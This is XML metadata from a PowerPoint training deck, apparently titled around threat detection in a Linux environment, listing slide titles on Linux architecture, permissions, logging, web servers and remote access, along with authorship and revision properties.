      <vt:lpstr>Linux OS Architecture</vt:lpstr>
      <vt:lpstr>Linux File System</vt:lpstr>
      <vt:lpstr>Linux File System</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Key Linux Components</vt:lpstr>
      <vt:lpstr>Key Linux Components</vt:lpstr>
      <vt:lpstr>/proc Directory</vt:lpstr>
      <vt:lpstr>/proc Directory</vt:lpstr>
      <vt:lpstr>Linux File System</vt:lpstr>
      <vt:lpstr>Shared Libraries</vt:lpstr>
      <vt:lpstr>Shared Libraries</vt:lpstr>
      <vt:lpstr>Key Linux Modules</vt:lpstr>
      <vt:lpstr>Key Linux Security Architecture</vt:lpstr>
      <vt:lpstr>Key Linux Security Architecture</vt:lpstr>
      <vt:lpstr>Key Linux Components</vt:lpstr>
      <vt:lpstr>Common Linux Daemons</vt:lpstr>
      <vt:lpstr>Common Linux Daemons</vt:lpstr>
      <vt:lpstr>Common Linux Daemons</vt:lpstr>
      <vt:lpstr>Key Linux components</vt:lpstr>
      <vt:lpstr>Scheduled Jobs</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>User and Kernel Space</vt:lpstr>
      <vt:lpstr>User Space</vt:lpstr>
      <vt:lpstr>Kernel Space</vt:lpstr>
      <vt:lpstr>User and Kernel Space</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Linux File System</vt:lpstr>
      <vt:lpstr>Linux Files</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Special Permissions</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Linux Logging</vt:lpstr>
      <vt:lpstr>Linux Logging</vt:lpstr>
      <vt:lpstr>Linux Logging</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Applying Knowledge</vt:lpstr>
      <vt:lpstr>Applications</vt:lpstr>
      <vt:lpstr>Web Servers</vt:lpstr>
      <vt:lpstr>Apache Web Servers</vt:lpstr>
      <vt:lpstr>Apache Web Servers</vt:lpstr>
      <vt:lpstr>Tomcat</vt:lpstr>
      <vt:lpstr>Tomcat</vt:lpstr>
      <vt:lpstr>Remote Access</vt:lpstr>
      <vt:lpstr>Remote Access</vt:lpstr>
      <vt:lpstr>Remote Access</vt:lpstr>
      <vt:lpstr>Remote Access</vt:lpstr>
      <vt:lpstr>Comparing Windows</vt:lpstr>
      <vt:lpstr>Comparing Windows </vt:lpstr>
      <vt:lpstr>Detecting Threats on Linux</vt:lpstr>
      <vt:lpstr>Detecting Threats on Linux</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>To the Keyboard – What Shrink Thinks You Should Know</vt:lpstr>
      <vt:lpstr>Useful CLI Syntax</vt:lpstr>
      <vt:lpstr>Useful CLI Syntax</vt:lpstr>
      <vt:lpstr>Useful CLI Syntax</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Linux OS Architecture</vt:lpstr>
      <vt:lpstr>Linux File System</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 Detection: Linux Environment</dc:title>
  <dc:creator>Ed.Linert</dc:creator>
  <dc:description>New template May 09. Completed the development of a master title slide.</dc:description>
  <cp:lastModifiedBy>MILAD, JASON M CTR USAF ACC USAFWS/CTI</cp:lastModifiedBy>
  <cp:revision>394</cp:revision>
  <cp:lastPrinted>2021-08-12T15:35:21Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-02-10T22:21:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-25T15:49:12Z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0x010100D94CF1871A8E364A8A2FE2AFBB0B197E</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>b937474f-3ac2-4ad4-bcd4-adcb23f622e0</vt:lpwstr>
  </property>
</Properties>
</file>